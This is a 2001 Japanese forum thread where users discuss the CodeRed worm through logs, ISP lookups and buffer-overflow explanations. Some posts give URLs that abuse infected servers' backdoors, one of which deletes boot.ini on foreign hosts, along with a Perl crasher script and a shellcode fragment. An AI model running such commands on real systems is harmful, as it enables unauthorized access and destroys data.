おはよ
新宿爆破実況で飛ばなかったのね
もしかして2ちゃんは存続決定?
またよごしちゃった
最近忙しすぎて2ちゃんより先に俺の頭飛びそう。

556 :名無しさん@お腹いっぱい。:01/09/01 10:36 ID:1YOPMGAs
pc198.hellobox.co.jp

こいつどうにかならんかな。しつこい上に教えてやりようがない。

557 :名無しさん:01/09/01 11:08 ID:fVawew5Q
Name: pc198.hellobox.co.jp Address: 211.120.14.198
株式会社ブルーバードオンライン (Bluebird Soft Inc)
BLUEBIRD-NET [211.120.14.192 <-> 211.120.14.255] 211.120.14.192/26
http://www.bluebird.ne.jp/ ここじゃないかな。

558 :名無しさん@お腹いっぱい。:01/09/01 17:14 ID:1YOPMGAs
おお、ありがとう。早速メールしてみる。

559 :え〜ん氏に捧ぐ ◆eEEenl7E :01/09/01 18:15 ID:QrX5p4gA
え〜ん

560 :え〜ん ◆IfHjzAm. :01/09/01 18:59 ID:JQN2L5.o
>>559
( ̄ー ̄)ニヤリッ

561 :俺も、え〜ん氏に捧ぐ ◆EeeenOwI :01/09/01 19:40 ID:4KjYsGEY
え〜ん

562 :え〜ん:01/09/01 20:13 ID:JQN2L5.o
>>561
IDおれにぴったりじゃん( ̄ー ̄)ニヤリッ

563 :え〜ん:01/09/01 20:26 ID:JQN2L5.o
>>559
>>561
その二つ何時間ぐらいで出た?おれめんどくさでやめちゃった。

564 :俺も、え〜ん氏に捧ぐ ◆EeeenOwI :01/09/01 20:35 ID:4KjYsGEY
>>563

>>559さんの書込みを見てからだから、1時間25分以内だね。

565 :名無しさん@お腹いっぱい。:01/09/01 22:44 ID:1YOPMGAs
どうしてこうzaqはバカばかりなんだ。

zaqd378bbcd.zaq.ne.jp

566 :名無しさん@お腹いっぱい。:01/09/01 22:51 ID:P1bytEMk
>565

ほんとまいるよな。っていうか、俺もザクだけど。
でも、ザクなんかよりこちとら大学の方がヤバイよ。
20台以上ヤラレテルっぽいのな…鬱

567 :名無しさん@お腹いっぱい。:01/09/01 22:56 ID:q.4n2.PY
evd20010828-15.enc

種類: ENC ファイル

場所: C:\Program Files\Network ICE\BlackICE

サイズ: 1.55 KB

検疫: 2001年9月1日 22:23:16

未提出検疫

ノートンでレポートしたらコードレットワームに
ブラックアイスが感染していた
こんな事ってあるの?   

568 :名無しさん@お腹いっぱい。:01/09/01 23:18 ID:AbL5gFxI
それはノートンのイヤガラセだよ。

569 :え〜ん ◆IfHjzAm. :01/09/01 23:35 ID:JQN2L5.o
よかったらPassゆずってくれでち・・

570 :名無しさん@お腹いっぱい。:01/09/01 23:49 ID:1YOPMGAs
当然プロバイダの方へもCodeRedは行っているだろうから、せめて自分の会員の
感染くらいは教えてやれぱいいのにな。
いまだに最低1分に一発はやって来るよ。

571 :名無しさん@お腹いっぱい。:01/09/02 00:05 ID:Mgwg09DE
>>567
encは、侵入者のデータを記録してるファイル。
CodeRedのコードも記録されてるから、それに反応したんでそ。

572 :名無しさん@お腹いっぱい。:01/09/02 00:16 ID:zdFPVZjA
>>571さん
有難う〜。
MEなのに何でなんだろうと思ってたから
(もしかしてこれも新種っ)て不安でした。
少し安心出来ました。

573 :俺も、え〜ん氏に捧ぐ:01/09/02 00:26 ID:UC6k9mJI
>>569
メールでPass送りました。

574 :名無しさん@お腹いっぱい。:01/09/02 02:46 ID:DJy/zDU6
こうやって一人一人警告していくしかないわい。

http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?/c+net+send+localhost+"あひょ〜!このマシンはCodeRed2に感染しています"
http://IP/scripts/root.exe?/c+net+send+localhost+"あひょ〜!このマシンはCodeRed2に感染しています"

ルーターのポート塞いで安心して、感染したままでいる人間もいるけど、これはISPに
警告してもらおう。

ちなみに中韓の連中相手にはもうこれだな。
http://IP/scripts/root.exe?/c+del+/a:S+c:\boot.ini

575 :名無しさん@お腹いっぱい。:01/09/02 06:51 ID:DJy/zDU6
うちのApacheは以下のように設定した。

Redirect /default.ida http://a102.ms.a.microsoft.com/f/102/1611/2h/download.microsoft.com/download/vstudio60ent/sp5/Full/WIN98Me/JA/vs6sp51.exe

少しは役に立つだろうか。

576 :え〜ん ◆EeeenOwI :01/09/02 07:50 ID:hraaZXkM
>>573
ありがとう、ありがたく頂戴いたします。

うまく出るかな

577 :俺も、え〜ん氏に捧ぐ:01/09/02 10:27 ID:zZ9cggRE
>>576

(・∀・)カコイイ!!

578 :名無しさん@お腹いっぱい。:01/09/02 12:41 ID:cKDE/yg.
>>575
意味なし。

579 :名無しさん@お腹いっぱい。:01/09/02 12:51 ID:7NEjOgSI
>>578
CodeRed感染サーバの動作が巨大ファイルのダウンロードで遅くなる程度の副作用とか・・・

580 :名無しさん@お腹いっぱい。:01/09/02 16:39 ID:WOGYiVm.
こんなのをダミーの鯖に設置しようと思うんですが、ダメでしょうか。


<default.ida>

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";

for(;;){
print "A";
}

581 :名無しさん@お腹いっぱい。:01/09/02 18:01 ID:DJy/zDU6
>>580
うーん、自分の回線の帯域を使うのはもったいない

582 :名無しさん@お腹いっぱい。:01/09/02 18:05 ID:DJy/zDU6
>>579
帯域が使われると遅くなるので、、相手の管理者も気づくんではないかと。
妙に遅いとか、何もしてないのにアクセスランプがついている、とかで。

583 :ななし:01/09/02 18:52 ID:PEvg3Hj.
>>580
相手はどうなるんですか?

584 :名無しさん@お腹いっぱい。:01/09/02 19:29 ID:DJy/zDU6
>>583
延々と「AAAAAAAAAAA…」を受け取り続けるという事に…

585 :名無しさん@お腹いっぱい。:01/09/02 19:51 ID:cKDE/yg.
>>579,582
根本的に勘違いしていると思われ。

586 :579:01/09/02 22:13 ID:7NEjOgSI
>>585
カキコ直後に気がついたよ(恥 相手はブラウザじゃないし、レスポンスも受信
しないだろうしね。

587 :580:01/09/02 22:58 ID:WOGYiVm.
やってみました。(コラ
んー、なんかイマイチって言いますか。。
そのあと2回もおなじIPからアクセスあったようなんですよね。
やっぱり、意味無いんですかね、、

588 :名無しさん@お腹いっぱい。:01/09/02 23:39 ID:DJy/zDU6
>>585
受信しないのかな?
するとオーバーフローで穴開けたあと、どういう手順で感染させるんだろう?

589 :名無しさん@お腹いっぱい。:01/09/02 23:40 ID:DJy/zDU6
何かこう、ええ方法はないんですかなあ

590 :名無しさん@お腹いっぱい。:01/09/03 01:51 ID:vgLCYeqs
>>580
それは実際に某社で使用されたクラッシャーじゃないですか。

591 :名無しさん@お腹いっぱい:01/09/03 02:02 ID:7Bw0WgZQ
台湾からのコードレッドアクセスが多いのは
気のせいだろうか

592 : :01/09/03 03:27 ID:YEBUuhG6
うちでは韓国からが多いですな。あと大陸。

593 :名無しさん@お腹いっぱい。:01/09/03 03:49 ID:gVfi7BBo
>>588
オーバーフローした段階で、すでに感染してます。

594 : :01/09/03 03:50 ID:YEBUuhG6
>>587
1.中国語の場合は、自己流布のためのスレッドを600個作成し、これがそれぞれ48時間、自己流布のために攻撃パケットを送信しつづける。中国語以外の場合は、自己流布のためのスレッドを300個作成し、これがそれぞれ24時間、自己流布のために攻撃パケットを送信しつづける

2.生成したIPアドレスへの攻撃に当たっては、非ブロッキングモードで接続を試みる。この場合、接続の完了を待たずに次の攻撃に移れるため、結果として、攻撃頻度が高くなる。

3.この攻撃によって他ホストへの接続に成功すると、自身のコピーを送りつける。現時点では自己改変機能はないため、Code Red IIはすべて同じ内容である。なお、このコピーは約3.5KBある。

という事なので、次々と同IPからアタックして来たとしても不思議ではないです。
3番目の処理をどのようにして判定しているのかがわかれば何か手が見つかるかも
知れないですが。

595 :名無し:01/09/03 03:50 ID:B/J7A8oc
9/1 ADSLを導入してルーターモデムTE4100に変えてから CodeRedが全くこなくなった。不思議だ。
TE4100が阻止しているとは思えない。

596 : :01/09/03 03:51 ID:YEBUuhG6
>>593
オーバーフローさせたあと、約3.5Kbの自分のコピーをを送りつけて実行させ、
感染を完了するみたいなんですが。

http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

597 : :01/09/03 03:53 ID:YEBUuhG6
>>595
以前とはIPが変わってはないですか?
第一オクテットが61, 201, 210, 211に被害が集中しているそうですが。

598 :名無しさん@お腹いっぱい。:01/09/03 03:56 ID:gVfi7BBo
>>596
ちがう。コピーを送りつけるのは、さらに次の犠牲者への感染。

599 : :01/09/03 04:01 ID:YEBUuhG6
>>598
重要なのはXの羅列の後ろに続くバイナリ部分ですが、これによって穴を開け、続いて
本体を流し込むのでは?
以下だけで完結するとは思えないんですが。

%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

600 :名無しさん@お腹いっぱい。:01/09/03 04:02 ID:gVfi7BBo
>>596
舌足らずなので補足(もう食傷って方、すんません)
自分のバッファあふれ=先の感染者から3.5kbのコピーをつっこまれることってこと。

いまさらながら、かのアレフワンによるバッファフローの解説の和訳。
http://linux.ascii24.com/linux/linuxcom/2000/06/13/465216-000.html
2ページ構成になっていて、2ページ目が詳しい。

601 :598:01/09/03 04:05 ID:gVfi7BBo
>>599
600読んでもらったら判ると思うけど、
結局、本体を流し込まれたら、バッファを処理していた(正式の)関数の処理が終わり、
呼び出し元の関数に戻ろうとする時点で流し込まれたコードに誘導され、乗っ取られるの。
#CodeRedが特殊ではなくて「バッファオーバフローによる制御奪取」の定義ともいえる。
ちょっと説明の要領がわるくてスマソ。

602 : :01/09/03 04:14 ID:YEBUuhG6
>>601
読んできました。オーバーフローの要領はわかりましたが、そうするとCodeRedは
最初のアタックのリクエストの中に本体を詰め込んでいるわけですか。
そうすると、いよいよはた迷惑な…

603 :名無しさん@お腹いっぱい。:01/09/03 04:16 ID:gVfi7BBo
>>599
>以下だけで完結するとは思えないんですが。
「URLだけじゃ3.5Kbないぞゴラあ」という疑問について。
POSTデータの中にウイルス本体があって、URLのあふれ部分は、そこにジャンプする
ように仕掛けをする最低限の部分しか入ってます。
なにげに、www.eeye.comの中にディスアセンブルリストが公開されてます。

604 :ほれ:01/09/03 04:19 ID:gVfi7BBo
かなり昔(いつだけっけか)に既出ですが、ここに詳細レポートとディスアセが。
http://www.eeye.com/html/Research/Advisories/AL20010804.html

605 : :01/09/03 04:22 ID:YEBUuhG6
>>603
なるほど、本体ごとやって来るものでしたか。よく考えているというかはた迷惑極まる
というか…。
ご指摘のリストを探してみます。

606 :404ero:01/09/03 04:23 ID:jZzH20RI
>>597
61からしかこねー。

607 : :01/09/03 04:23 ID:YEBUuhG6
>>604
あ、すいません。助かります。

608 :名無しさん@お腹いっぱい。:01/09/03 04:25 ID:YEBUuhG6
>>606
そりゃ、あなたの現在のIPが61だからでは?

609 :579:01/09/03 04:29 ID:gVfi7BBo
>>585
ディスアセでウラをとってみた。
ちゃんと相手に届いてるかどうか、send()の返り値の確認 & recv(1バイトだけ)を
行って即close()してました。
すぐにcloseすると、ちゃんとインデックスサーバのコードが起動されないから、
受信完了も待つのではとかすかに期待したが、そんなことはなかった(w
やはり大量データを応答してCodeRedIIを困らせるという作戦はやっぱり没。

610 : :01/09/03 04:42 ID:YEBUuhG6
>>609
seg000:00000366のあたりでちゃんと考えてありますねぇ…。
何か良い方法は無いものか…。

611 :名無し:01/09/03 04:47 ID:B/J7A8oc
>>597
ADSLのIPは、61.*.*.* で以前とは変わっていません。

612 : :01/09/03 04:56 ID:YEBUuhG6
>>611
ですか。そうするとなんでだろ。私の所にはもう連日大入り満員です。
パチンコ屋だったらありがたいですがCodeRed2では。

613 :名無し:01/09/03 05:35 ID:B/J7A8oc
>>612
FLETS ISDNのときは 切断で 61 211といろいろ IPが変わりました。
そのときは、どのIPでも いっぱいきましたが 今ADSLでは全くきません。
ちなみに プロパは、ODNです。 

614 :(´∀` ):01/09/03 05:46 ID:1ms3Y2/E
2chを睥睨して寄りつかなかったリアルハッカ−兼有能なSEさん方
も、知識欲を刺激するこのスレのお陰で書き込んでいるもよう。
(・∀・)イイ!!

615 : :01/09/03 06:08 ID:YEBUuhG6
>>613
もちろんルーターは静的NATやDMZの設定になっているわけですよね?
不思議ですな。
うちは現在のところ211ですが、ガンガン来ています。
他の61の方はどうなんでしょう

616 :RealPlayer:01/09/03 06:10 ID:n9XPzzkE
W2KのMSのCR対策パッチ当てると、RealPlay起動でマシンが
リセットされる。

index service止めたら直ったヨ。

Duron750 見れのG450

617 : :01/09/03 07:33 ID:YEBUuhG6
2001/07/17 07:27 80,282 geroshabu43.zip
2001/07/18 22:30 12,255 kankiri100.zip
2001/07/16 21:56 313,582 Longi018.lzh
2001/03/29 22:29 26,624 Longinus.dll
2001/05/24 10:44 599,040 Longinus.exe
2001/08/03 07:28 431 Longinus.ini
2001/05/24 10:50 3,794 Longinus.txt
2001/08/12 20:14 <DIR> sakura0f2
2001/08/12 20:14 <DIR> siri&crack
2001/08/12 20:14 <DIR> HamaEvolution
2001/08/12 20:14 <DIR> iria107a

こういうファイル名がc:\にズラズラ並んでいる人でも、CodeRed2の餌食になってい
ますな。net sendで警告しておきました。

618 :名無し:01/09/03 09:39 ID:B/J7A8oc
>>615
ええ ルーターの内側にWEBサーバーがあり PORT80で外から参照できます。
全く 不思議です。

他の方で 住友のTE4000/4100を使っている方は、いないのでしょうか?

以下 ルーターのFWバージョンです。
MegaBit Gear TE4000 Ethernet Modem, G.lite, Annex C
Hardware Revision: 0001
Software Version: 01.22 (Mon Apr 2 15:59:21 JST 2001)
Boot ROM Version: 01.22 (Mon Apr 2 16:00:38 JST 2001)
DSP Firmware Version: 7.31
MAC Address: 00:00:**:**:**:**

619 :名無しさん@お腹いっぱい。:01/09/03 15:41 ID:jPJmSlF6
http://slashdot.jp/comments.pl?sid=01/08/05/0441253&cid=126
これ使ったヤツは居ないのか?
レポート求む。

620 :名無しさん@お腹いっぱい。:01/09/03 19:02 ID:x0k.eZyE
>>618
うちも61.xxx系ですが、9/1にぱたっと来なくなりました。
9/1の到着数の累計は0です。
9/2の午後からは、また来始めましたが。今も来てます。
同じくTE4000を使ってます。

621 :名無しさん@お腹いっぱい。:01/09/03 22:57 ID:A2Kvd.mA
明日のNHKニュース10
CodeRed特集らしい。
どうせ内容は期待できないけどね。

622 :名無しさん@お腹いっぱい。:01/09/03 22:58 ID:rWcH8A0o
あしたNHK ニュース10でコードレッドの特集をやるらしい。
既出かな。

623 :621:01/09/03 22:59 ID:A2Kvd.mA
>>622
ケコーンしてしまった(w

624 :名無しさん@お腹いっぱい。:01/09/03 22:59 ID:rWcH8A0o
かぶった。一歩おそかった。

625 :名無し:01/09/04 05:40 ID:tv8XnI5A
>>620
試しに 一度切断して IPを変えたところやって来ました。
以前と変わらないペースで(W
IP変更後も61.*.*.*は、変わらないので RedのアルゴリズムではIPアドレスを
総なめにするわけではないようですね。

[04/Sep/2001:04:52:13 +0900] pasocon.nsc1.co.jp 晒し

626 : :01/09/04 10:45 ID:NbbivV4M
今日接続し直したら211から61へIPが変化しました。
が、相変わらず猛烈なCodeRed2の嵐が吹き荒れております。
ひょっとして治まるかと思い、ちょっと期待していたのですが。

627 : :01/09/04 11:01 ID:NbbivV4M
>>625
するとCodeRedのアルゴリズムで生成されないIPにうまく当たった時、攻撃の網から
漏れるという事になりますか。

>>619
MicrosoftのHPへリダイレクトさせてnet sendを送るというプログラムですが、まず
リダイレクト自体を受けつけるかどうか。
net sendの方はこのままでは失敗する確率も高いかと思います。
scripts/root.exe
よりも
scripts/..%c0%af../winnt/system32/cmd.exe
の方が通る率が高いようです。
私は日本のIPから来た時だけ手動でやっていますが、効果はありますよ。
警告を入れると大抵ネットから切断されます。
英語、日本語で同じ文面の警告を一回づつ送信するようにすれば完璧ですかな。

628 :秋厨:01/09/04 12:53 ID:WndhDzug
約1月、このような調子が続いています。これもCODEREDでしょうか。
ZAQに問い合わせても埒が開かきません。
厨房にできる対策があればご教示下さい。

Alert 01/09/04 12:40:29 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.239.86.43,http
Alert 01/09/04 12:40:23 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.239.86.43,http
Alert 01/09/04 12:40:20 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.239.86.43,http
Alert 01/09/04 12:37:36 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.181.246.98,http
Alert 01/09/04 12:37:30 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.181.246.98,http
Alert 01/09/04 12:37:27 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.181.246.98,http
Alert 01/09/04 12:36:27 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.135.12.65,http
Alert 01/09/04 12:36:21 NDIS Filter 未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.135.12.65,http

629 : :01/09/04 14:40 ID:NbbivV4M
>>628
恐らくCodeRedでしょう。きちんとブロックされていますので何ら大過は無いと思います。
これはもうZAQに問い合わせても対処のしようがありません。
もしもルーターかFWのフィルタ設定が可能でしたら、Port80をリジェクトするように設定
されれば、この実に頻発する警告から解放されます。


ところでうちで現在、>>619さんの指摘されたカウンタープログラムをPHPで組んで動か
しておりますが、効果があるのか無いのかサッパリ不明です。

630 :秋厨:01/09/04 17:18 ID:WndhDzug
>>629
有難うございます。少し安心できました。
警告うざいのでルーター導入を考えてみようかと考えています。

631 : :01/09/04 17:31 ID:NbbivV4M
>>630
そういう警告が出るところを見ると、何かFWソフトが入っているでしょうから、明示的に
Port80を遮断する設定にすればOKですよ。


スクリプトをしかけて以降、1時間に2アタックに激減しとります。効果があるんでしょ
うか。

632 :秋厨:01/09/04 17:54 ID:WndhDzug
>>631
ノートンを入れています。Port80は、IGMPプロトコルを遮断すると
なっていました。ブロックされているということですのでやはり
警告は放置しておくことにします。ご親切にどうもです。


関係ありませんがこの板変ですね。

633 :通りすがり:01/09/04 18:34 ID:1LInRZGk
>>632
書き込まなければ更新されないとか?
リロードしても。

それなら
http://www6.ocn.ne.jp/~mirv/bbstable.html
から入るとヨロシ。
原因は板のURLが変更になったから。

このことじゃなかったらスマソ

634 :test:01/09/04 19:20 ID:rflmgZhU
今夜、NHK ニュース10でコードレッドの特集やるらしいけど、
 えーん氏は出演するのかな??

635 :名無しさん@お腹いっぱい。:01/09/04 20:13 ID:AxzkIkS2
えーんage

636 :え〜ん ◆EeeenOwI :01/09/04 20:34 ID:62nf0MYw


|   。
|⌒ヾ
|冫、)
|` / ジー
| /
|/
|

637 :名無しさん@お腹いっぱい。:01/09/04 22:00 ID:qxlGO2z6
NHKage

638 :名無しさん@お腹いっぱい。:01/09/04 22:02 ID:NMeHuGg6
ニュースのさわりにちょっとやってたね>ニュース10

639 :名無しさん@お腹いっぱい。:01/09/04 22:18 ID:NMeHuGg6
はじまったね。

640 :名無しさん@お腹いっぱい。:01/09/04 22:22 ID:nUqM7pj2
苦情があいついだISPってどこよ?

641 : :01/09/04 22:23 ID:QnLzruDk
眠そうな三沢見たいな顔だ。社長

642 :なーなし:01/09/04 22:24 ID:qhuJzpbE
コードレッドって、ウィルスだったんですね>NHK
ワームだと思ってたよ。

643 : :01/09/04 22:24 ID:eC9LqcGM
葬手苦だ...

644 :名無しさん@お腹いっぱい。:01/09/04 22:25 ID:bt7mwv6E
>>640
東京メタかなかインターリンクかな
気になったのだが、え〜ん氏=平○氏?

645 : :01/09/04 22:25 ID:e.5HhGyM
オワタ

646 :名無しさん@お腹いっぱい。:01/09/04 22:25 ID:NMeHuGg6
連続書き込み失礼。
くだらない突っ込みなのでsageで。

ウィルスウィルスって・・・ワームだと思うのだが。

「技術の進歩に伴って、codeなウィルスが・・・」って、掛けてあるのかな?(藁

でも、思ったより短かったな。もっとやるべきだと思うのだが。

647 :名無しさん@お腹いっぱい。:01/09/04 22:26 ID:VNIRlFow
CodeRedってワームでしょ。NHKが無知なのか
認知しやすい言葉で置き換えたのか・・・。

648 :名無しさん@お腹いっぱい。:01/09/04 22:27 ID:fh8H140E
この影響受けた会社ってめた○っくのこと?通信障害起こしてたのはめた○っく以外知らない。

649 :名無しさん@お腹いっぱい。:01/09/04 22:28 ID:nUqM7pj2
番組中で「コードレッドバスター」って言ってたような。(w
なのでインターリンクかな。

650 :名無しさん@お腹いっぱい。:01/09/04 22:28 ID:8Is9q6Zo
>>644
コードレッドバスター(w

CodeRedとIIがゴッチャになってたな。
まぁ取り上げただけマシということでしょう、きっと。

651 :名無しさん@お腹いっぱい。:01/09/04 22:29 ID:870dclA.
つーか、ある意味ではセキュリティーホール突くわけだからワームか?

652 :え〜ん ◆EeeenOwI :01/09/04 22:29 ID:62nf0MYw
>>644
インターリンクのことだと思う。
おれは顔出しNG

>>647
ほぼこういうこと。

653 :え〜ん ◆EeeenOwI :01/09/04 22:30 ID:62nf0MYw
普通のウイルスに比べて地味でしょ。
ニュース性に乏しいってイテタヨ

654 :644:01/09/04 22:33 ID:bt7mwv6E
>>652
そですかー。
そりゃ総鉄屑つかってるわけないもんな(w

655 :名無しさん@お腹いっぱい。:01/09/04 22:34 ID:/7CoF25U
>>653 だからウイルスに感染しても気付かない奴が多い。
ITとか言ってる前にそこから何とかしてくれ。

656 :え〜ん ◆EeeenOwI :01/09/04 22:37 ID:62nf0MYw
おれが念を押したのは、「初期の9月で終わると、いうことが無くなった。」と
「ダイヤルUPでも感染者がかなりいる。」この二つ。

657 :え〜ん ◆EeeenOwI :01/09/04 22:44 ID:62nf0MYw
某放送局はこの板見てたよ。
途中からおれが書き込まなかったのはその為。

658 :名無しさん@お腹いっぱい。:01/09/04 23:16 ID:wR3TdB32
CATV内部では感染者数が徐々にピーク時に戻りつつあり。
鬱だ・・。

659 :名無しさん@お腹いっぱい。:01/09/04 23:31 ID:nVESYnOU
おれは、プロバの人間だが、 CodeRedによるアクセスの苦情を受けて、該当する感染者に連絡するのだが、「対応拒否」する馬鹿がたまにいて困ってるよ。

一番の被害者は自分自身だってのが解らねえのかな?
MSもこんなやつに2000なんぞ使わせるなよ。

660 :名無しさん@お腹いっぱい。:01/09/04 23:44 ID:fh8H140E
>>659 その警告ってメールで警告するの?それとも電話?
会社名とかは出さなくていいから教えて欲しいんだけど。
警告無視するやつはデータ消えたのプロバのせいにすると思われ。

661 :名無しさん@お腹いっぱい。:01/09/04 23:50 ID:c2zHubj6
対応拒否って何で?
そいつらは「自分がCode redに感染している」及び
「回りを攻撃している」事実は認識してるの?対応拒否?馬鹿?
逆にそういうやつを野放しにしてたらプロバの信頼に関わると思われ。
まぁプロバ側はしょうがないんだろうけど・・・なんだかなぁ。

662 :名無しさん@お腹いっぱい。:01/09/04 23:51 ID:KuXLl5i2
IISのセキュリティ問題が出るたび
MSの責任問題にならないのが毎回不思議なのですが・・・

663 :名無しさん@お腹いっぱい。:01/09/05 00:11 ID:1/CEs.Mg
X-B○X遅れもバグのせい?

664 :名無しさん@お腹いっぱい。:01/09/05 00:38 ID:8x5yEsTU
対応拒否の考えられるパターン(予想)
1)開き直り
他のところも感染してるから、ウチだけ対応したくない。
他が全部対応したらウチも対応してやる。

感染して困る所は自分で対応すればいいだろう、ウチは感染しても困らないから対応しないぞ!
どうしても対応して貰いたかったら、金出せ!

2)とぼける
はぁ〜、なんですか「それ」
法律や規則で対応するって決まっているんですか?
えっそういう訳ではないの? じゃ面倒だからしません。

665 :名無し:01/09/05 00:45 ID:czFYeVUU
IPを逆引きすると不思議なドメイン名称がやってくる、よく分からん。

[04/Sep/2001:23:04:34 +0900] web - - "GET /default.ida?
[04/Sep/2001:23:08:32 +0900] bymain - -
[04/Sep/2001:23:21:20 +0900] yl-hncmptg0852b - -
[04/Sep/2001:23:40:36 +0900] jhkim - -
[04/Sep/2001:23:41:43 +0900] bsy - -
[04/Sep/2001:23:48:09 +0900] milibo - -
[05/Sep/2001:00:00:12 +0900] king104 - -
[05/Sep/2001:00:14:41 +0900] wang2 - -
[05/Sep/2001:00:15:08 +0900] nib - -
[05/Sep/2001:00:26:15 +0900] soo - -

666 : :01/09/05 01:22 ID:euhcl.mU
>>659
そりゃ本当ですか?
困ったなあ。

>>664
それじゃ、結局ホールを突いてシステムをクラッシュしてやるしかないという事になり
ますか。
でも、当人のデスクトップやマイドキュメントに保存しているファイルや、メールの中身
すら読めてしまうというのに、それでも対応拒否なんですかな。

>>665
ログを逆引きさせずに保存してみては?

667 :名無しさん@お腹いっぱい。:01/09/05 04:00 ID:FBvl6WK6
対応拒否っていうよりも、対応法説明されても、ちんぷんかんぷんで
「できない」って答える人も多そう。
「そこまでいうなら来て直してくれ」とかいわれませんでした?
個人でWin2000の人ならそいつの責任だけど、
小さな会社でサーバ立てた人間が辞めると分かる人が
誰もいなくなるという例は結構ある。
この場合本当に「できない」んですよね。
ネットに繋ぐなとは言えないし・・・。

668 :名無しさん@お腹いっぱい。:01/09/05 07:51 ID:oflMJjs.
鯖立てる責任みたいなのはあると思うんだけどなぁ・・・

669 :名無しさん:01/09/05 08:02 ID:wscDL0fQ
>668
でもFrontPageExpress入れると本人の意思と無関係にIISがEnable
になるとかって話なかったっけ?

670 :名無しさん@お腹いっぱい。:01/09/05 15:14 ID:eZhdL2N2
うちは、LINU&アパッチなんで、今回は関係ないですが、
いちおう上司に危険性の事を話したら、
『プロバイダを通してるのに、そんな危険なもんが来るのか!?』
とか言われた・・┐(;´Д`)┌

671 :ついでに・・・:01/09/05 15:20 ID:eZhdL2N2
うちはりなっくすだから感染しないですっていったら、
少し誇らしげな表情をしていた(;TДT)

672 :名無しさん@お腹いっぱい。:01/09/05 21:02 ID:siKDsk7M
なんとなく、
上司「メモリを増やしたんだ、すごいだろう」
部下「どのくらい増やしたんですか?」
上司「2枚だ」
というジョークを思い出してしまった。

673 :名無しさん@お腹いっぱい。:01/09/05 23:13 ID:efS75itc
某CATVネットでは警告メールがでてます。
感染したまま放置した場合、利用を停止することがあるとか。
警告を無視した場合は加入契約の継続を断るとまで書いてました。

有料サポートの案内も一緒に書いてあったけど(w

674 :名無しさん@お腹いっぱい。:01/09/05 23:17 ID:GM0ZkKBc
>>673
それぐらいの対応で普通じゃないのかな。
とりあえず切断しちまえよ。

675 : :01/09/06 00:35 ID:Pqo8iEOE
そういう強硬手段を採らざるを得ないという事は、やはり警告を無視する人、
放置したままの人が多いという事ですか?

676 :名無しさん@お腹いっぱい。:01/09/06 00:47 ID:RzgEqgQY
root.exe叩いてくるバカがいます。たすけてください・・・

677 : :01/09/06 00:53 ID:w/4xwCVE
何気に思うんだけど、新規でIIS走らす鯖機導入して
立ち上げ直後に新規感染してたら、、全然減らないぞ(#゚Д゚)
マイ糞、もちっと水際で防ぐ努力しろ。

678 :名無しさん@お腹いっぱい。:01/09/06 01:46 ID:Z55tpNiY
コードレッドってある日になったら、サーバ落とすんだっけ?
サーカムと混乱している可能性あり。

679 : :01/09/06 02:15 ID:1tmlAHrY
>>678
ホワイトハウスの事か?

680 :名無しさん@お腹いっぱい。:01/09/06 02:21 ID:O2.bL52c
>>677
いきなりグローバルの海に晒したままインストールしちゃダメ!
初歩の初歩だべさ。

681 :677:01/09/06 02:33 ID:1tmlAHrY
>>680
いや、っていうか、新規導入って事はそれすら知らないユーザーって事も有
りうるわけで。。。

682 :名無しさん@お腹いっぱい。:01/09/06 08:52 ID:zqVsUebs
>>677
同意
>>680のいう事は正論だけど、実際にそれをしない奴らが山ほどいるよ!
この前(8月はじめ)も、不安定になったサーバーの相談を受けたので、CodeRedの感染の可能性を示唆したら・・・
「それは無いと思います、何度も再インストールしてちゃんとパッチも当てました!」と逆ギレされそうになった。
でもね、ネットに接続したまま再インストールしたんだって。
※確かに環境によっては、切った状態でインストールするのは面倒な時もあるしな・・
 手間が増えた分の費用の総額って凄くないか!

683 :名無しさん@お腹いっぱい。:01/09/06 09:10 ID:l4frVbes
>>682
せめてFirewallの設定を変更してグローバルからの接続を
総蹴りにしてからやって欲しいな

684 :名無しさん@お腹いっぱい。:01/09/06 22:46
http://cnet.sphere.ne.jp/News/Infostand/Item/2001-0906-J-2.html
いやん。

685 :名無しさん@お腹いっぱい。:01/09/06 22:58
>>682
そういえば確かに「ちゃんとやった!」、「間違いなく指示通りにやった!」というクライアントの
主張が正しかった事は一度もないです。

686 :名無しさん@お腹いっぱい。:01/09/07 00:56
対CodeRedワームCodeGreen期待あげ

687 :名無しさん@お腹いっぱい。 :01/09/07 02:06
とりあえず、最近の状況連絡っす。@CODERED WATCHER あげ
いまだ、衰えず こーどれっどちゃん
[2001/09/03 22:18:24] CodeRed Type XXXXX from: 210.150.114.xxx / c114192.ap.plala.or.jp
[2001/09/03 22:44:50] CodeRed Type XXXXX from: 202.107.80.xx /
[2001/09/03 23:09:10] CodeRed Type XXXXX from: 202.123.198.xxx /
[2001/09/03 23:42:41] CodeRed Type XXXXX from: 202.207.210.x /
[2001/09/04 1:42:03] CodeRed Type XXXXX from: 202.98.84.xxx /
[2001/09/04 1:55:17] CodeRed Type XXXXX from: 202.99.60.xxx /
[2001/09/04 1:56:32] CodeRed Type XXXXX from: 202.109.139.xx /
[2001/09/04 2:50:03] CodeRed Type XXXXX from: 202.39.13.xxx /
[2001/09/04 3:27:50] CodeRed Type XXXXX from: 202.197.107.x /
